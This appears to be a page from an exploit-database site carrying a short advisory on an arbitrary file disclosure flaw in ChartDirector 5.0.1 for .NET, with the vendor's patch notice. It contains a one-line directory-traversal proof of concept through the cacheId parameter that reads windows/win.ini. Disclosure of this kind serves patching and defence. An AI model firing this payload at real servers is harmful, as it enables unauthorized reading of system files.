0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability
===================================================================== ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability ===================================================================== ==================================================== Advisory No.: ISNSC-0910 ============= ChartDirector Critical File Access Information ====== Author: DokFLeed Program Affected: http://www.chartdir.com for .NET Version: 5.0.1 Severity: Critical. Type of Advisory: Mid Disclosure. Affected/Tested Versions: Random Program Description ================== Widely used Chart Component on Financial & Stock Trading websites Overview ========= The query variable "cacheId=" is not sanitized, it will can allow critical files download Proof Of Concept ================ ?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini Solution/Fix ============ Upgrade to latest Chart Dir or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2): http://www.advsofteng.com/netchartdir501p2.zip Vendor Status ============ The problem you mentions affect ChartDirector for .NET. The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue no longer occurs with the current version of ChartDirector for .NET. For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2): http://www.advsofteng.com/netchartdir501p2.zip # 0day.today [2024-09-28] #